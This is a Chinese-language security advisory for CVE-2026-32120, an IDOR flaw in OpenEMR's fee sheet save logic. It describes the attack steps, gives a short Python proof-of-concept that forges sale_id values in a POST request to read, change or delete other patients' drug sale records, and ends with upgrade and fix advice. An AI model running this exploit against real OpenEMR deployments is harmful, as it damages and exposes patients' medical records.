IPBUF安全漏洞报告
English
CVE-2026-32120 CVSS 6.5 中危

CVE-2026-32120 OpenEMR IDOR漏洞

披露日期: 2026-03-25
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-32120
漏洞类型
不安全的直接对象引用 (IDOR)
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
OpenEMR

相关标签

IDOROpenEMR越权漏洞医疗数据安全

漏洞概述

OpenEMR在8.0.0.3版本之前存在不安全的直接对象引用(IDOR)漏洞。由于费用清单保存逻辑未验证记录归属,拥有费用清单权限的攻击者可通过修改隐藏字段,任意删除、修改或读取其他患者的药品销售记录,严重影响数据完整性。

技术细节

该漏洞源于OpenEMR在处理费用清单保存逻辑时缺乏充分的权限验证。具体而言,受影响文件`library/FeeSheet.class.php`中的`save()`方法直接接收并利用了用户提供的`prod[][sale_id]`参数。系统未对该参数对应的`drug_sales`记录是否归属于当前登录用户所负责的患者或当前就诊流程进行校验。因此,攻击者可以利用这一缺陷,通过构造包含恶意`sale_id`的HTTP POST请求,触发后端数据库的SELECT、UPDATE或DELETE操作。这使得经过身份验证但权限受限的攻击者能够绕过业务逻辑限制,对系统中任意患者的药品销售记录进行查看、篡改甚至删除,造成严重的数据完整性破坏。

攻击链分析

STEP 1
1. 获取凭证
攻击者注册或获取一个具有费用清单(Fee Sheet)访问权限的低权限账户。
STEP 2
2. 分析请求
攻击者拦截保存费用清单的请求,发现隐藏字段 `prod[][sale_id]`。
STEP 3
3. 构造载荷
攻击者修改请求中的 `sale_id` 参数,将其替换为目标患者(受害者)的药品销售记录ID。
STEP 4
4. 发起攻击
发送篡改后的请求到服务器端点。
STEP 5
5. 执行恶意操作
服务器由于缺乏校验,直接执行SQL语句,导致目标记录被读取、修改或删除。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL for the vulnerable endpoint url = "https://target.com/openemr/interface/main/finder/modules/fee_sheet/ajax_save.php" # Attacker's session cookie (requires valid authentication) cookies = {'PHPSESSID': 'attacker_session_id'} # Exploit payload: Manipulating 'sale_id' to target arbitrary records # If the attacker knows the sale_id of a victim's drug sale, they can modify it. payload = { 'prod[][sale_id]': '99999', # ID of the victim's record to be modified/deleted 'prod[][drug_id]': '1', 'prod[][fee]': '0', 'prod[][units]': '0' # Setting units to 0 or modifying other fields } response = requests.post(url, data=payload, cookies=cookies) if response.status_code == 200: print("[+] Exploit request sent successfully.") print("[+] Check if the target record was modified or deleted.") else: print("[-] Request failed.")

影响范围

OpenEMR < 8.0.0.3

防御指南

临时缓解措施
建议立即升级至OpenEMR 8.0.0.3版本。如无法立即升级,应修改`library/FeeSheet.class.php`文件中的`save()`方法,在执行SQL操作前增加对`sale_id`的所有权验证,确保该记录属于当前正在处理的patient和encounter。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表